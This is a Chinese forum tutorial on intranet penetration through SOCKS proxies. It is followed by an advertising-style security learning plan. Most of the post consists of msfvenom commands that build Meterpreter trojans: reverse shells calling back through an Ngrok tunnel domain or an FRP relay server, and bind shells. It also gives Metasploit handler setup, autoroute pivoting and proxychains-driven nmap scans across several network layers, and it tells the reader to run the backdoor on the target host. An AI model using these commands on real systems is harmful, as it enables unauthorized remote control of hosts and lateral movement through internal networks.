论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
安全
›
主机安全
›
内网安全:Socks 代理 -- 本地代理 技术.
内网安全:Socks 代理 -- 本地代理 技术.
西河刘卡车医
论坛元老
|
2024-8-30 17:37:58
|
显示全部楼层
|
阅读模式
楼主
主题
1017
|
帖子
1017
|
积分
3051
内网安全:Socks 代理 || 本地代理 技术.
Socks
代理又称全能代理,就像有许多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包罗http、ftp哀求及其它范例的哀求。它分socks 4
和socks 5两种范例,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.
目次:
内网安全:Socks 代理 技术.
两个内网通讯上线( Ngrok )
(1)开通隧道:
(2)下载客户端:
(3)生成一个程序后门:
(4)举行监听:(kali)
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境搭建:
(2)生成程序后面:
(3)举行监听:(kali)
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息网络及设置访问:
(2)开启本地代理:
(3)内网扫描:
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
(2)举行监听:
(3)信息网络及设置访问:
(4)开启本地代理:
第四层内网渗透:
(1)生成正向程序后门:
(2)举行监听:
代理解决的问题:(1)内网有外网 (2)内网有过滤 (3)内网无外网
复制代码
两个内网通讯上线( Ngrok )
开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)
复制代码
(1)开通隧道:
(2)下载客户端:
解压放到 kali 中:(切换的刚刚下载的文件目录中)
(1)./sunny clientid 115735315695 // 执行
./sunny clientid 隧道的IP
复制代码
(3)生成一个程序后门:(木马)
msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
复制代码
(4)举行监听:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_http
(4)set lhost 192.168.0.106 // 本地的 IP 地址
(5)set lport 4444 // 本地的 端口.
(6)exploit
复制代码
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境
搭建:
需要有自己的服务器,有来搭建跳板.
【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases
复制代码
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677 // 这个端口修改为 服务器 开放的就行
启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 // 转发给本机的 5555
remote_port = 6000 // 服务端用 6000 端口转发给本机
启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini
复制代码
(2)生成程序后面:(木马)
msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe
复制代码
(3)举行监听:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_tcp
(4)set LHOST 127.0.0.1
(5)set LPORT 5555 // 本机监听的端口【和控制端的一样】
(6)exploit
然后把程序后门(木马)放在目标主机上执行就行.
复制代码
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息网络及设置访问:
(1)run get_local_subnets // 获取网络接口
(2)run autoroute -p // 查看路由地址
(3)run autoroute -s 10.0.20.0/24 // 添加地二层内网的路由网段.
或
(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段
复制代码
(2)开启本地代理:
background // 挂起会话
如果是msf6,使用代理模板为:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板为:
use auxiliary/server/socks4a
(1)set srvport 2222 // 设置本地代理端口为2222
(2)exploit // 运行
复制代码
(3)内网扫描:
打开 /etc/proxychains4.conf 文件:
socks4 192.168.0.106 2222 // 添加 本地的代理和端口
复制代码
进行扫描:
proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.
-sT:扫描 TCP 数据包已建立的连接 connect
复制代码
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
复制代码
(2)举行监听:
要在和上面一样的 msf 会话中执行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.20.99 // 第二层内网的 IP 地址
(4)set lport 54321 // 和程序后面(木马)一样的端口
(5)exploit
复制代码
(3)信息网络及设置访问:
(1)run get_local_subnets // 获取网络接口
(2)run autoroute -p // 查看路由地址
(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段.
复制代码
(4)开启本地代理:
background // 挂起会话
如果是msf6,使用代理模板为:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板为:
use auxiliary/server/socks4a
复制代码
(1)set srvport 6666 // 默认端口6666
(2)exploit // 运行
复制代码
第四层内网渗透:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
复制代码
(2)举行监听:
要在和上面一样的 msf 会话中执行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.10.110 // 第二层内网的 IP 地址
(4)set lport 9876 // 和程序后面(木马)一样的端口
(5)exploit
复制代码
学习链接:第70天:内网安全-
域横向内网周游Socks代理隧道技术_哔哩哔哩_bilibili
接下来我将给各位同砚划分一张学习计划表!
学习计划
那么题目又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零底子应该从什么开始学起:
阶段一:初级网络安全工程师
接下来我将给各人安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全干系的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识(2天)
①相识行业干系背景,前景,确定发展方向。
②学习网络安全干系法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试底子(1周)
①渗透测试的流程、分类、标准
②信息网络技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统底子(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固底子)
4、计算机网络底子(1周)
①计算机网络底子、协议和架构
②网络通信原理、OSI模子、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库底子操作(2天)
①数据库底子
②SQL语言底子
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?
阶段二:中级or高级网络安全工程师(看自己本领)
综合薪资区间15k~30k
7、脚本编程学习(4周)
在网络安全领域。是否具备编程本领是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时间,每每必要对现有工具举行扩展,或者编写符合我们要求的工具、自动化脚本,这个时间就必要具备一定的编程本领。在分秒必争的CTF竞赛中,想要高效地利用自制的脚本工具来实现各种目的,更是必要拥有编程本领。
零底子入门的同砚,我发起选择脚本语言Python/PHP/Go/Java中的一种,对常用库举行编程学习
搭建开辟环境和选择IDE,PHP环境保举Wamp和XAMPP,IDE强烈保举Sublime;
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,保举《Python焦点编程》,没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
认识MVC架构,并试着学习一个PHP框架或者Python框架 (可选)
相识Bootstrap的结构或者CSS。
阶段三:顶级网络安全工程师
如果你对网络安全入门感兴趣,那么你必要的话可以点击这里
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
西河刘卡车医
论坛元老
这个人很懒什么都没写!
楼主热帖
【容器~原始真解】Docker —— 容器的 ...
工行、建行、农行的 IT 架构是什么样的 ...
轻量级CI/CD发布部署环境搭建及使用_06 ...
全双工与半双工技术剖析
PHP判断远程文件是否存在的四种方法 ...
超融合一体机上新,打通信创落地的“顶 ...
Spring--循环依赖的原理(四)--为什么用 ...
继承和多重继承
一文了解华为FusionInsight MRS HBase ...
MySQL高可用架构搭建实战
标签云
运维
CIO
存储
服务器
浏览过的版块
人工智能
快速回复
返回顶部
返回列表